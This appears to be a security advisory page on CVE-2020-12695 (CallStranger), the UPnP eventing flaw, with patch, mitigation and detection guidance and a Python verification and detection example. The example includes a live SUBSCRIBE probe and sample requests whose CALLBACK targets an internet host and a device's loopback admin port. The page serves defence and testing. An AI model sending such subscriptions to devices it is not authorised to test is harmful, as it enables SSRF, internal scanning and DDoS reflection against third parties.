CVE-2020-12695
📋 TL;DR
CallStranger is a flaw in UPnP eventing: a device accepts an HTTP SUBSCRIBE request whose CALLBACK header names an arbitrary URL and then sends HTTP NOTIFY messages to that URL. An unauthenticated attacker who can reach the device's event URL can therefore make the device issue requests on their behalf, which yields SSRF against hosts the device can reach (including its own loopback services), TCP port scanning of internal networks, and reflected/amplified DDoS traffic against third parties, with the device rather than the attacker appearing as the source. It affects any device or software implementing the UPnP Device Architecture as it stood before the 17 April 2020 update, which includes IoT devices, routers, media servers, and many network-enabled consumer electronics.
💻 Affected Systems
- Any device or software that implements UPnP eventing (SUBSCRIBE/NOTIFY) according to the Device Architecture specification as published before 17 April 2020; the vendor list below covers confirmed products and is not exhaustive
📦 Affected Products
Adsl by Broadcom
Archer C50 by Tp Link
Ep 101 by Epson
Fedora by Fedoraproject
Hg255s by Huawei
Hg532e by Huawei
Hostapd by W1.fi
M571t by Epson
Ubuntu Linux by Canonical
Wap131 by Cisco
Wap150 by Cisco
Wap351 by Cisco
Windows 10 by Microsoft
Wnhde111 by Netgear
Xbox One by Microsoft
Xp 100 by Epson
Xp 2101 by Epson
Xp 2105 by Epson
Xp 241 by Epson
Xp 320 by Epson
Xp 330 by Epson
Xp 340 by Epson
Xp 4100 by Epson
Xp 4105 by Epson
Xp 440 by Epson
Xp 620 by Epson
Xp 630 by Epson
Xp 702 by Epson
Xp 8500 by Epson
Xp 8600 by Epson
Xp 960 by Epson
Xp 970 by Epson
Zonedirector 1200 by Ruckussecurity
⚠️ Risk & Real-World Impact
Worst Case
Attackers can use vulnerable devices as SSRF proxies against internal networks (including the device's own management interfaces on loopback), enlist many internet-exposed devices into reflected/amplified DDoS attacks against third parties, or use them for port scanning and network reconnaissance. Because the device originates the NOTIFY traffic, the victim sees the device's address, not the attacker's.
Likely Case
Most commonly exploited for DDoS reflection/amplification and for scanning, leading to service disruption for the targeted third party and disclosure of internal network topology and open ports.
If Mitigated
With UPnP unreachable from the internet and UPnP-enabled devices segmented from critical systems, exploitation requires a foothold on the device's own segment, and impact is limited to reconnaissance of, and SSRF against, hosts reachable from that segment.
🎯 Exploit Status
A public checker (github.com/yunuscadirci/CallStranger) and a Zeek detection package (github.com/corelight/callstranger-detector) are available; both are listed under References. Exploitation only requires the ability to reach the device's UPnP event subscription URL (HTTP, usually on a high TCP port advertised in the device description XML); no authentication is required.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: UPnP Device Architecture 2.0 as updated on 2020-04-17 (implementations must validate the CALLBACK URL before accepting a subscription); for individual products, the firmware or package version named in the vendor advisory
Vendor Advisory: https://openconnectivity.org/developer/specifications/upnp-resources/upnp/
Restart Required: Yes
Instructions:
1. Update the UPnP stack to a version that implements the April 2020 CALLBACK validation.
2. Check the vendor-specific advisory for each affected device; for Linux distributions, apply the package updates in the Debian, Ubuntu and Fedora advisories listed under References (the wpa/hostapd packages among them).
3. Apply firmware updates to affected devices.
4. Restart the UPnP service or the device after patching.
🔧 Temporary Workarounds
Disable UPnP on perimeter devices
Disable Universal Plug and Play on internet-facing routers and firewalls, and make sure no UPnP device's HTTP control/event ports are forwarded or otherwise exposed to the internet. This blocks the internet-to-device SUBSCRIBE path but does nothing against an attacker already on the LAN.
Varies by device; typically in the router admin interface under UPnP settings.
Network segmentation
Put UPnP-enabled devices (printers, media devices, consumer routers, game consoles) on their own segment, separated from servers, management networks and other critical infrastructure, so that SSRF and scans launched through a device reach only that segment.
🧯 If You Can't Patch
- Block inbound access from the internet to UPnP devices' HTTP control and event ports (the ones advertised in the device description); the SUBSCRIBE request is the attack vector, and SSDP (UDP/1900) is only discovery
- Apply egress filtering so that UPnP devices cannot open outbound HTTP connections to arbitrary internet hosts; this stops the device's NOTIFY callbacks from reaching external victims
- Deploy network monitoring (for example the Zeek package listed under References) to detect SUBSCRIBE requests whose CALLBACK points off the local network
🔍 How to Verify
Check if Vulnerable:
Run the CallStranger checker from github.com/yunuscadirci/CallStranger (python3 CallStranger.py). It discovers UPnP devices on the local network via SSDP and sends test subscriptions; it relies on an external callback endpoint to confirm that a device's NOTIFY actually leaves your network, so read its README before running it in a sensitive environment. Manually: send a SUBSCRIBE to a device's event URL with a CALLBACK you control outside the device's network; if the device answers 200 OK and a NOTIFY arrives at that callback, the device is vulnerable.
Check Version:
Compare the device firmware version, or the UPnP library/package version, against the vendor advisory; the specification date (17 April 2020) only identifies the revision a fixed implementation follows, not a version string you can read off a device
Verify Fix Applied:
Run the check again after patching: a fixed device rejects subscriptions whose CALLBACK is off its network and sends no NOTIFY to the test callback, so the checker reports no vulnerable devices
📡 Detection & Monitoring
Log Indicators:
- HTTP SUBSCRIBE requests (UPnP eventing) whose CALLBACK header names a host outside the subscriber's own network, including the device's loopback address or internet addresses
- Outbound HTTP NOTIFY requests from UPnP devices to destinations they have never talked to, especially internet hosts or internal ports that are not UPnP control points
- Many SUBSCRIBE requests in a short time from one source, or subscriptions with long TIMEOUT values from hosts that never issue UNSUBSCRIBE
Network Indicators:
- SUBSCRIBE traffic reaching device event URLs from outside the local segment (a device's event port is advertised in its description XML and is normally used only from the LAN)
- NOTIFY traffic from UPnP devices crossing segment or perimeter boundaries
- Repeated NOTIFY bursts from several UPnP devices towards one external IP (reflection/amplification in progress)
SIEM Query:
SSDP (UDP/1900) is only the discovery channel; the exploit is an HTTP SUBSCRIBE to the device's event URL followed by HTTP NOTIFY from the device, so query parsed HTTP rather than port 1900. Pseudo-query (field names vary by SIEM):
(http.method="SUBSCRIBE" AND http.request.header.callback NOT MATCHES "^<http://(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.|169\.254\.)")
OR (http.method="NOTIFY" AND src_ip IN upnp_device_ips AND dest_ip NOT IN internal_ranges)
Corelight's Zeek package (github.com/corelight/callstranger-detector, listed under References) provides Zeek-based detection of this traffic.
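The following is an added example written for this page; it is not code from the CallStranger checker, the Corelight package, or any vendor. It serves both the verification and the detection sections above: it builds the SUBSCRIBE request as a control point sends it, models the device-side decision that separates vulnerable firmware (accepts any CALLBACK) from fixed firmware (rejects callbacks off the subscriber's network), reuses that same check as detection logic over a constructed capture, and includes a live probe for devices you are authorised to test. The event path, addresses and capture are constructed; the "same /24 or the subscriber itself" policy is this example's assumption and not the specification's exact wording; the 412 status is the one UPnP DA uses for a refused SUBSCRIBE.

```python
import http.client
import ipaddress
import re
from urllib.parse import urlsplit

# CALLBACK carries one or more URLs, each wrapped in angle brackets.
CALLBACK_RE = re.compile(r"<([^>]+)>")


def build_subscribe(device_host, event_path, callback_url, timeout_s=1800):
    """Raw GENA SUBSCRIBE request as a control point sends it to an event URL."""
    return (f"SUBSCRIBE {event_path} HTTP/1.1\r\nHOST: {device_host}\r\n"
            f"CALLBACK: <{callback_url}>\r\nNT: upnp:event\r\n"
            f"TIMEOUT: Second-{timeout_s}\r\n\r\n").encode()


def parse_request(raw):
    """Minimal HTTP request parser: method, path and lower-cased headers."""
    lines = raw.decode(errors="replace").split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def off_network_callbacks(callback_header, client_ip, local_net=None):
    """Callback URLs that do not point back into the subscriber's own network.
    Policy (this example's assumption, not spec text): host must be the
    subscriber itself or a literal IP inside local_net (default: subscriber's
    /24); hostnames are rejected because they cannot be vetted without DNS."""
    client = ipaddress.ip_address(client_ip)
    net = (ipaddress.ip_network(local_net) if local_net
           else ipaddress.ip_network(f"{client_ip}/24", strict=False))
    rejected = []
    for url in CALLBACK_RE.findall(callback_header):
        try:
            addr = ipaddress.ip_address(urlsplit(url).hostname)
        except ValueError:          # hostname, empty host or malformed URL
            rejected.append(url)
            continue
        if addr != client and addr not in net:
            rejected.append(url)
    return rejected


def handle_subscribe(raw, client_ip, hardened):
    """Simulated device side; returns (status, reason). Vulnerable firmware
    accepts any well-formed CALLBACK and later sends NOTIFY to it; hardened
    firmware vets it first. 412 is the UPnP DA status for a refused SUBSCRIBE."""
    req = parse_request(raw)
    if req["method"] != "SUBSCRIBE":
        return 405, "not a subscription request"
    hdr = req["headers"]
    if hdr.get("nt") != "upnp:event" or "callback" not in hdr:
        return 412, "missing NT or CALLBACK"
    if hardened:
        bad = off_network_callbacks(hdr["callback"], client_ip)
        if bad:
            return 412, "callback not on subscriber network: " + ", ".join(bad)
    return 200, "subscribed; device will NOTIFY " + hdr["callback"]


def flag_subscriptions(records, local_net=None):
    """Detection over captured (src_ip, raw_request) pairs: every SUBSCRIBE
    whose CALLBACK leaves the source host's network is a finding."""
    findings = []
    for src_ip, raw in records:
        req = parse_request(raw)
        if req["method"] != "SUBSCRIBE":
            continue
        bad = off_network_callbacks(req["headers"].get("callback", ""), src_ip, local_net)
        if bad:
            findings.append({"src": src_ip, "path": req["path"], "callbacks": bad})
    return findings


def probe(event_url, callback_url, timeout=5.0):
    """Live check (sends real traffic): one SUBSCRIBE with a CALLBACK outside the
    device's network. 200 means the device still accepts CallStranger-style
    subscriptions and will contact callback_url, so only use a listener you
    control and UNSUBSCRIBE with the returned SID afterwards."""
    u = urlsplit(event_url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    conn.request("SUBSCRIBE", u.path or "/", headers={
        "HOST": u.netloc, "CALLBACK": f"<{callback_url}>",
        "NT": "upnp:event", "TIMEOUT": "Second-300"})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status, resp.getheader("SID")


# Constructed sample capture (not real traffic): a legitimate LAN subscription, a
# callback to an internet address (reflection), a callback to the device's own
# loopback (SSRF against its admin port), and an unrelated GET.
EVENT = "/upnp/event/basicevent1"
SAMPLE_CAPTURE = [
    ("192.168.1.50", build_subscribe("192.168.1.1:49152", EVENT, "http://192.168.1.50:5000/cb")),
    ("192.168.1.77", build_subscribe("192.168.1.1:49152", EVENT, "http://203.0.113.10:80/")),
    ("192.168.1.77", build_subscribe("192.168.1.1:49152", EVENT, "http://127.0.0.1:8080/admin")),
    ("192.168.1.50", b"GET /desc.xml HTTP/1.1\r\nHOST: 192.168.1.1:49152\r\n\r\n"),
]
```

Over SAMPLE_CAPTURE, handle_subscribe returns 200 for all three subscriptions when hardened=False and 412 for the internet and loopback callbacks when hardened=True, while flag_subscriptions reports exactly those two requests from 192.168.1.77. probe() is the only function that touches the network; the CALLBACK it sends must name a listener you control, because a vulnerable device will keep sending NOTIFY there until the subscription expires or is cancelled.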
🔗 References
- http://packetstormsecurity.com/files/158051/CallStranger-UPnP-Vulnerability-Checker.html
- http://www.openwall.com/lists/oss-security/2020/06/08/2
- https://corelight.blog/2020/06/10/detecting-the-new-callstranger-upnp-vulnerability-with-zeek/
- https://github.com/corelight/callstranger-detector
- https://github.com/yunuscadirci/CallStranger
- https://lists.debian.org/debian-lts-announce/2020/08/msg00011.html
- https://lists.debian.org/debian-lts-announce/2020/08/msg00013.html
- https://lists.debian.org/debian-lts-announce/2020/12/msg00017.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L3SHL4LOFGHJ3DIXSUIQELGVBDJ7V7LB/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MZDWHKGN3LMGSUEOAAVAMOD3IUIPJVOJ/
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQEYVY4D7LASH6AI4WK3IK2QBFHHF3Q2/
- https://usn.ubuntu.com/4494-1/
- https://www.callstranger.com
- https://www.debian.org/security/2020/dsa-4806
- https://www.debian.org/security/2021/dsa-4898
- https://www.kb.cert.org/vuls/id/339275
- https://www.tenable.com/blog/cve-2020-12695-callstranger-vulnerability-in-universal-plug-and-play-upnp-puts-billions-of